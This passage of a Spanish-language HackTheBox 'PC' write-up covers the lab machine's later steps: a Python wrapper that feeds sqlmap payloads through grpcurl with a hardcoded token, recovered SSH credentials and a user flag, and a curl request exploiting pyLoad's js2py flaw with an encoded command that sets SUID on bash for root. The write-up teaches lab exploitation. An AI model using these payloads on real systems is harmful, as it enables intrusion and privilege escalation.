    <span class="n">cmd</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">grpcurl</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">-plaintext</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">-d</span><span class="sh">'</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="sh">'</span><span class="s">-rpc-header</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYzRydGEiLCJleHAiOjE2ODQ5ODYwNDZ9.BVAx_9R6Cch8vwCUHknTLBm9l0wukqMrsy9TJcsGlJE</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">10.10.11.214:50051</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">SimpleApp.getInfo</span><span class="sh">'</span><span class="p">]</span>
    <span class="n">output</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span>
    <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">port</span><span class="o">=</span><span class="mi">12345</span><span class="p">)</span>
</code></pre></div></div>

<p>Como pueden ver, al parametro ID vulnerable a SQLi se le concatena el payload, donde ese payload es el de sqlmap, despues se le pasa ese payload a la variable cmd, y por ultimo ejecuta ese comando, que vendria siendo el grpcurl pero con el payload de sqlmap</p>

<p>Y esto daria el mismo resultado que la primera forma:</p>

<p><img src="/assets/img/PC/sqli4.png" alt=""></p>

<p>Ahora solo queda conectarnos a ssh con las credenciales que obtuvimos</p>

<p><strong>usr:</strong> sau</p>

<p><strong>passwd:</strong> HereIsYourPassWord1431</p>

<p>Y ya tenemos la primera flag:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sau@pc:~$ cat user.txt 
9346084c975a3b22536e1c6ef783075f
</code></pre></div></div>

<h2 id="escalada">Escalada</h2>

<p>Empezare usando linpeas para ver que nos reporta, lo mas interesante es que en la maquina victima esta corriendo el puerto 8000:</p>

<p><img src="/assets/img/PC/8.png" alt=""></p>

<p>Y como se imaginan, debemos de hacer port forwarding, ejecutamos este comando en nuestra maquina:</p>

<p><code class="language-plaintext highlighter-rouge">ssh -L 8000:127.0.0.1:8000 sau@10.10.11.214</code></p>

<p>Una vez dentro, veremos una pagina de pyLoad, buscando en google por vulnerabilidades, existe una ejecucion arbitraria de codigo que abusa de la funcion js2py, aca hay un post que habla sobre ello: <a href="https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/">https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/</a></p>

<p>Para conseguir root, debemos de asignarle permisos SUID a bash, esto lo hacemos con:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1:8000' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
--data-binary $'package=xxx&amp;crypted=AAAA&amp;jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%63%68%6d%6f%64%20%75%2b%73%20%2f%62%69%6e%2f%62%61%73%68%22%29;f=function%20f2(){};&amp;passwords=aaaa' \
$'http://127.0.0.1:8000/flash/addcrypted2'
</code></pre></div></div>

<p><img src="/assets/img/PC/9.png" alt=""></p>

<p>Y listo, esto es todo, gracias por leer ❤</p>

<p><img src="/assets/img/PC/waifu.gif" alt=""></p>


    </div>
    
    
</article>
<div class="post-nav">
<a class="previous" href="/hackthebox/2023/05/22/htb-toxic.html" title="HackTheBox Toxic - LFI to RCE via Log Poisoning y Insecure Deserialization en PHPSESSID">HackTheBox Toxic - LFI to RCE...</a><a class="next" href="/un%20poco%20de%20pentesting/2023/05/29/UPDP-ssti.html" title="Un Poco de Pentesting - SSTI en Jinja2">Un Poco de Pentesting - SSTI...</a>
</div>
<div class="post-related">
      <div>Related Articles</div>
      <ul>
        <li><a class="post-link" href="/explotacion%20binaria/2022/08/03/leak-stack-canary.html" title="Un Poco de Pentesting - SSTI en Jinja2">Leak stack canary - bypass</a></li>
<li><a class="post-link" href="/un%20poco%20de%20pentesting/2023/05/29/UPDP-ssti.html" title="Un Poco de Pentesting - SSTI en Jinja2">Un Poco de Pentesting - SSTI en Jinja2</a></li>
<li><a class="post-link" href="/hackthebox/2023/05/08/htb-monitorsTwo.html" title="Un Poco de Pentesting - SSTI en Jinja2">HackTheBox MonitorsTwo - Unauthenticated RCE &amp; Docker Weak Permissions</a></li>
<li><a class="post-link" href="/explotacion%20binaria/2023/02/26/bypassNX-mprotect.html" title="Un Poco de Pentesting - SSTI en Jinja2">Bypass NX usando mprotect() en x64</a></li>
</ul>
    </div>
<div class="post-comments"></div></section>
  
<script src="https://unpkg.com/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js"></script>
<script>addBackToTop({
  diameter: 56,
  backgroundColor: '#ff5100',
  textColor: '#fff'
})</script>
  
  
</div>


  </section>
  <section class="sidebar" style="margin-left: 15px;">
    <!-- Get sidebar items --></section>
</div>

<script src="https://unpkg.com/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js"></script>
<script>addBackToTop({
  diameter: 56,
  backgroundColor: '#ff5100',
  textColor: '#fff'
})</script>
      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div align="center" class="wrapper">
    <div class="site-footer-inner">
<div class="footer-col rss-subscribe">
	  <font size="1" color="gray">
	  <!--RSS SVG-->
   	<svg aria-hidden="true" fill="#ff4e00" height="12" width="12" viewbox="0 0 16 16" version="1.1" data-view-component="true" class="octicon octicon-rss mr-1">
    <path fill-rule="evenodd" d="M2.002 2.725a.75.75 0 01.797-.699C8.79 2.42 13.58 7.21 13.974 13.201a.75.75 0 11-1.497.098 10.502 10.502 0 00-9.776-9.776.75.75 0 01-.7-.798zM2 13a1 1 0 112 0 1 1 0 01-2 0zm.84-5.95a.75.75 0 00-.179 1.489c2.509.3 4.5 2.291 4.8 4.8a.75.75 0 101.49-.178A7.003 7.003 0 002.838 7.05z"></path>
    </svg>
	  <a href="/feed.xml" target="_blank"> RSS </a>订阅 |  
    <!--提供支持-->
    由 <a title="Jekyll is a simple, blog-aware, static site
    generator." href="http://jekyllrb.com/" target="_blank">Jekyll</a> &amp; <a title="Yat, yet
    another theme." href="https://github.com/jeffreytse/jekyll-theme-yat" target="_blank">Yat Theme</a>提供支持
	  </font>
</div>

    <!--版权-->
    <div>
    <font size="1" color="gray">
    Copyright © 2017-2023 <a href="https://github.com/ic4rta/">c4rta</a> All Rights Reserved
    </font>
</div>

      <!--logo
  <div>

    <a href="https://github.com/vanhiupun" target="_blank">
      <img src="https://visitor-badge.glitch.me/badge?page_id=vanhiupun.visitor-badge&right_color=Orange" alt="visitor" />
    </a> 
	    
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/jekyll.yml" target="_blank">
        <img src="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/jekyll.yml/badge.svg" />
    </a>
      
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/codeql-analysis.yml" target="_blank">
      <img src="https://github.com/vanhiupun/Vanhiupun.github.io/actions/workflows/codeql-analysis.yml/badge.svg">
    </a> 
      
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io" target="_blank">
      <img src="https://www.codefactor.io/repository/github/vanhiupun/vanhiupun.github.io/badge" alt="CodeFactor" />
    </a>
    
    <a href="https://codeclimate.com/github/vanhiupun/Vanhiupun.github.io/maintainability">
      <img src="https://api.codeclimate.com/v1/badges/708da11ffb90a8f6f13b/maintainability" alt="maintainability" />
    </a>
    
    <a href="https://rubygems.org/gems/jekyll-theme-yat" target="_blank">
        <img src="https://badge.fury.io/rb/jekyll-theme-yat.svg"     alt="jekyll-theme-yat" />
    </a> 
    
    <a href="https://github.com/vanhiupun" target="_blank">
        <img src="https://img.shields.io/badge/Github%20Repository-222222?style=flat-square&logo=github&logoColor=ffffff" alt="Github" />
    </a> 
          
    <a href="https://vanhiupun.github.io" target="_blank">
        <img src="https://img.shields.io/badge/Github%20Page-222222?style=flat-square&logo=github&logoColor=ffffff" alt="Blog" />
    </a> 
          
    <a href="mailto:fanxiaobin422@gmail.com" target="_blank">
        <img src="https://img.shields.io/badge/Send%20me%20Gmail-EA4335?style=flat-square&logo=Gmail&logoColor=ffffff" alt="Gmail" />
    </a> 
          
    <a href="https://github.com/vanhiupun/Vanhiupun.github.io/blob/c0c037532393ee2718892f87b200a0bbe33e7eb9/License" target="_blank">
        <img src="https://img.shields.io/badge/License%20MIT-f2cb05?style=flat-square&logo=Mitsubishi&logoColor=222222" alt="MIT" />
    </a>
          
    <a href="http://jekyllthemes.org/" target="_blank">
        <img src="https://img.shields.io/badge/Jekyll%20Themes-f2cb05?style=flat-square&logo=Jekyll&logoColor=222222" alt="jekyll-themes" />
    </a> 
    
    <a href="https://github.com/jeffreytse/jekyll-theme-yat" target="_blank">
        <img src="https://img.shields.io/badge/Jekyll%C2%B7Theme%C2%B7Yat-f2cb05?style=flat-square&logo=github&logoColor=181717" alt="Jekyll-yat" />
    </a> 
      
    <a href="https://raw.githubusercontent.com/vanhiupun/Vanhiupun.github.io/master/assets/images/img/zz.png" target="_blank">
        <img src="https://img.shields.io/badge/GitHub%20Sponsors-EA4335?style=flat-square&logo=GitHub%20Sponsors&logoColor=222222" alt="/GitHub%20Sponsors" />
    </a> 
  </div>-->
  </div>
  </div>
</footer>
</body>
</html><html>
<script src="https://unpkg.com/vanilla-back-to-top@7.2.1/dist/vanilla-back-to-top.min.js"></script>
<script>addBackToTop({
  diameter: 56,
  backgroundColor: '#ff5100',
  textColor: '#fff'
})</script>
</html>
